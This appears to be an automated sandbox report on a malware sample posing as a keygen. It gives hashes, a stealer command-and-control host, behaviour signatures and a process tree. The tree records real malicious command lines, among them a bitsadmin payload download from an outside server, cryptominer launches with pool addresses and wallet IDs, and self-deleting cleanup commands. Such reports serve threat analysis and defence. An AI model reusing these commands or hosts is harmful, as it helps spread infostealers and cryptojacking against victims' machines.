Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1795s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 18:53

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2556
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2656
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2336
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2328
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1368
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1244
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1188
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1080
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:684
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\yoSyQZIYq\yoSyQZIYq.dll",yoSyQZIYq
                      2⤵
                      • Loads dropped DLL
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:5628
                    • C:\Users\Admin\AppData\Roaming\bwfiwcd
                      C:\Users\Admin\AppData\Roaming\bwfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5048
                      • C:\Users\Admin\AppData\Roaming\bwfiwcd
                        C:\Users\Admin\AppData\Roaming\bwfiwcd
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4792
                    • C:\Users\Admin\AppData\Roaming\hvfiwcd
                      C:\Users\Admin\AppData\Roaming\hvfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2056
                    • C:\Users\Admin\AppData\Roaming\hvfiwcd
                      C:\Users\Admin\AppData\Roaming\hvfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2700
                    • C:\Users\Admin\AppData\Roaming\bwfiwcd
                      C:\Users\Admin\AppData\Roaming\bwfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:6036
                      • C:\Users\Admin\AppData\Roaming\bwfiwcd
                        C:\Users\Admin\AppData\Roaming\bwfiwcd
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:680
                    • C:\Users\Admin\AppData\Roaming\hvfiwcd
                      C:\Users\Admin\AppData\Roaming\hvfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:68
                    • C:\Users\Admin\AppData\Roaming\bwfiwcd
                      C:\Users\Admin\AppData\Roaming\bwfiwcd
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3360
                      • C:\Users\Admin\AppData\Roaming\bwfiwcd
                        C:\Users\Admin\AppData\Roaming\bwfiwcd
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2500
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3656
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2920
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:680
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1884
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2136
                        • C:\Users\Admin\AppData\Local\Temp\is-FFQU9.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-FFQU9.tmp\Install.tmp" /SL5="$4014A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3484
                          • C:\Users\Admin\AppData\Local\Temp\is-QEV92.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-QEV92.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3940
                            • C:\Program Files\Windows Defender\KQVMKWXMPY\ultramediaburner.exe
                              "C:\Program Files\Windows Defender\KQVMKWXMPY\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3896
                              • C:\Users\Admin\AppData\Local\Temp\is-6IOT1.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-6IOT1.tmp\ultramediaburner.tmp" /SL5="$6002E,281924,62464,C:\Program Files\Windows Defender\KQVMKWXMPY\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4112
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4156
                            • C:\Users\Admin\AppData\Local\Temp\f1-a19e8-979-ca29a-125565d138e89\Mylevosune.exe
                              "C:\Users\Admin\AppData\Local\Temp\f1-a19e8-979-ca29a-125565d138e89\Mylevosune.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4192
                            • C:\Users\Admin\AppData\Local\Temp\52-3c8a4-9fc-bd4bd-a70ff896f0e1b\Kunufisaemu.exe
                              "C:\Users\Admin\AppData\Local\Temp\52-3c8a4-9fc-bd4bd-a70ff896f0e1b\Kunufisaemu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4236
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yr0j5rgj.s3y\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5084
                                • C:\Users\Admin\AppData\Local\Temp\yr0j5rgj.s3y\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\yr0j5rgj.s3y\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1884
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdzi33wb.xyz\google-game.exe & exit
                                6⤵
                                  PID:3776
                                  • C:\Users\Admin\AppData\Local\Temp\wdzi33wb.xyz\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\wdzi33wb.xyz\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4500
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      PID:4432
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vybsqu5r.vl1\md1_1eaf.exe & exit
                                  6⤵
                                    PID:4232
                                    • C:\Users\Admin\AppData\Local\Temp\vybsqu5r.vl1\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\vybsqu5r.vl1\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5460
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yvnfo0ad.waa\askinstall39.exe & exit
                                    6⤵
                                      PID:5276
                                      • C:\Users\Admin\AppData\Local\Temp\yvnfo0ad.waa\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\yvnfo0ad.waa\askinstall39.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5716
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          8⤵
                                            PID:5660
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              9⤵
                                              • Kills process with taskkill
                                              PID:3744
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eaqwkg1v.etb\y1.exe & exit
                                        6⤵
                                          PID:6064
                                          • C:\Users\Admin\AppData\Local\Temp\eaqwkg1v.etb\y1.exe
                                            C:\Users\Admin\AppData\Local\Temp\eaqwkg1v.etb\y1.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5872
                                            • C:\Users\Admin\AppData\Local\Temp\qmePFEV5Tb.exe
                                              "C:\Users\Admin\AppData\Local\Temp\qmePFEV5Tb.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              PID:5592
                                              • C:\Users\Admin\AppData\Roaming\1619463489333.exe
                                                "C:\Users\Admin\AppData\Roaming\1619463489333.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619463489333.txt"
                                                9⤵
                                                • Executes dropped EXE
                                                PID:5720
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\qmePFEV5Tb.exe"
                                                9⤵
                                                  PID:5408
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 127.0.0.1 -n 3
                                                    10⤵
                                                    • Runs ping.exe
                                                    PID:4752
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eaqwkg1v.etb\y1.exe"
                                                8⤵
                                                  PID:4392
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /T 10 /NOBREAK
                                                    9⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3088
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\os00do0n.qq4\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:3972
                                                • C:\Users\Admin\AppData\Local\Temp\os00do0n.qq4\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\os00do0n.qq4\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:4976
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4964
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5252
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4876
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5032
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:3484
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5696
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4960
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                8⤵
                                                                • Checks for any installed AV software in registry
                                                                PID:5848
                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                8⤵
                                                                • Download via BitsAdmin
                                                                PID:2780
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPnmElQXTNHIIFt1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                PID:5572
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pgOoJ99SYVwji1SL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5256
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5612
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:6132
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:648
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5704
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5336
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yoSyQZIYq\yoSyQZIYq.dll" yoSyQZIYq
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          PID:5412
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yoSyQZIYq\yoSyQZIYq.dll" yoSyQZIYq
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            • Drops file in System32 directory
                                                                            PID:6140
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4324
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5528
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:3976
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4436
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgEE8E.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4128
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5524
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eznaibhp.r2r\inst.exe & exit
                                                                                6⤵
                                                                                  PID:6032
                                                                                  • C:\Users\Admin\AppData\Local\Temp\eznaibhp.r2r\inst.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\eznaibhp.r2r\inst.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1868
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycacypk4.p03\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:6116
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znxaad1e.gkh\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5332
                                                                                      • C:\Users\Admin\AppData\Local\Temp\znxaad1e.gkh\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\znxaad1e.gkh\toolspab1.exe
                                                                                        7⤵
                                                                                          PID:5032
                                                                                          • C:\Users\Admin\AppData\Local\Temp\znxaad1e.gkh\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\znxaad1e.gkh\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4380
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1xayvgw.u5a\app.exe /8-2222 & exit
                                                                                        6⤵
                                                                                          PID:4744
                                                                                          • C:\Users\Admin\AppData\Local\Temp\k1xayvgw.u5a\app.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\k1xayvgw.u5a\app.exe /8-2222
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5836
                                                                                            • C:\Users\Admin\AppData\Local\Temp\k1xayvgw.u5a\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\k1xayvgw.u5a\app.exe" /8-2222
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4004
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qxo2m1x.v0y\c7ae36fa.exe & exit
                                                                                          6⤵
                                                                                            PID:5976
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3qxo2m1x.v0y\c7ae36fa.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\3qxo2m1x.v0y\c7ae36fa.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:2728
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4320
                                                                                    • C:\Users\Admin\AppData\Roaming\8572.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\8572.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:680
                                                                                      • C:\Users\Admin\AppData\Roaming\8572.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\8572.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:2100
                                                                                    • C:\Users\Admin\AppData\Roaming\889F.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\889F.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4328
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w25923@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:4580
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w18922 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:4084
                                                                                      • C:\Users\Admin\AppData\Roaming\89AA.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\89AA.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:1508
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:3800
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:4140
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5216
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
